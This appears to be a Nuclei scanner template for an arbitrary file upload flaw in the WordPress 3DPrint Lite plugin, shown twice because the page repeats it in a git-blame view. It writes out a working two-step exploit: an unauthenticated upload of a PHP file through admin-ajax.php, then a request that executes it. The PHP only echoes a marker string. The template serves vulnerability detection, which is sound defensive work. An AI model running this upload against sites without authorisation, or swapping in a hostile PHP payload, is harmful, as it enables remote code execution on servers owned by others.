nuclei-templates/vulnerabilities/wordpress/3dprint-arbitrary-file-uplo...

id: 3dprint-arbitrary-file-upload

info:
  name: WordPress 3DPrint Lite <1.9.1.5 - Arbitrary File Upload
  author: SecTheBit
  severity: high
  description: |
    WordPress 3DPrint Lite plugin before 1.9.1.5 contains an arbitrary file upload vulnerability. The p3dlite_handle_upload AJAX action of the plugin does not have any authorization and does not check the uploaded file. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: Upgrade to 1.9.1.5 or later.
  reference:
    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
    - https://www.exploit-db.com/exploits/50321
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-434
  metadata:
    verified: true
  tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353

        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="action"

        p3dlite_handle_upload
        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="file"; filename={{randstr}}.php
        Content-Type: text/php

        <?php echo '3DPrint-arbitrary-file-upload'; ?>
        -----------------------------54331109111293931601238262353--

      - |
        GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(all_headers_2, "text/html")'
          - "status_code_2 == 200"
          - "contains(body_2, '3DPrint-arbitrary-file-upload')"
        condition: and

# Enhanced by md on 2022/10/31
Update and rename 3DPrint-arbitrary-file-upload.yaml to 3dprint-arbitrary-file-upload.yaml 2022-09-15 10:21:34 +00:00			`id: 3dprint-arbitrary-file-upload`
Create 3DPrint-arbitrary-file-upload.yaml 2022-09-07 05:56:34 +00:00
			`info:`
Dashboard Content Enhancements (#5943) Dashboard Content Enhancements 2022-11-08 20:55:31 +00:00			`name: WordPress 3DPrint Lite <1.9.1.5 - Arbitrary File Upload`
Create 3DPrint-arbitrary-file-upload.yaml 2022-09-07 05:56:34 +00:00			`author: SecTheBit`
			`severity: high`
			`description: \|`
Dashboard Content Enhancements (#5943) Dashboard Content Enhancements 2022-11-08 20:55:31 +00:00			`WordPress 3DPrint Lite plugin before 1.9.1.5 contains an arbitrary file upload vulnerability. The p3dlite_handle_upload AJAX action of the plugin does not have any authorization and does not check the uploaded file. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.`
			`remediation: Upgrade to 1.9.1.5 or later.`
Update 3DPrint-arbitrary-file-upload.yaml 2022-09-07 05:59:34 +00:00			`reference:`
Create 3DPrint-arbitrary-file-upload.yaml 2022-09-07 05:56:34 +00:00			`- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282`
			`- https://www.exploit-db.com/exploits/50321`
Dashboard Content Enhancements (#5943) Dashboard Content Enhancements 2022-11-08 20:55:31 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.8`
			`cwe-id: CWE-434`
Create 3DPrint-arbitrary-file-upload.yaml 2022-09-07 05:56:34 +00:00			`metadata:`
			`verified: true`
Update and rename 3DPrint-arbitrary-file-upload.yaml to 3dprint-arbitrary-file-upload.yaml 2022-09-15 10:21:34 +00:00			`tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint`
Create 3DPrint-arbitrary-file-upload.yaml 2022-09-07 05:56:34 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept-Encoding: gzip, deflate`
			`Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353`

			`-----------------------------54331109111293931601238262353`
			`Content-Disposition: form-data; name="action"`

			`p3dlite_handle_upload`
			`-----------------------------54331109111293931601238262353`
			`Content-Disposition: form-data; name="file"; filename={{randstr}}.php`
			`Content-Type: text/php`

Update 3DPrint-arbitrary-file-upload.yaml 2022-09-15 09:20:10 +00:00			`<?php echo '3DPrint-arbitrary-file-upload'; ?>`
Create 3DPrint-arbitrary-file-upload.yaml 2022-09-07 05:56:34 +00:00			`-----------------------------54331109111293931601238262353--`

			`- \|`
			`GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`req-condition: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(all_headers_2, "text/html")'`
			`- "status_code_2 == 200"`
Update 3DPrint-arbitrary-file-upload.yaml 2022-09-15 09:20:10 +00:00			`- "contains(body_2, '3DPrint-arbitrary-file-upload')"`
Create 3DPrint-arbitrary-file-upload.yaml 2022-09-07 05:56:34 +00:00			`condition: and`
fix-conflict 2022-10-25 13:40:49 +00:00
Dashboard Content Enhancements (#5943) Dashboard Content Enhancements 2022-11-08 20:55:31 +00:00			`# Enhanced by md on 2022/10/31`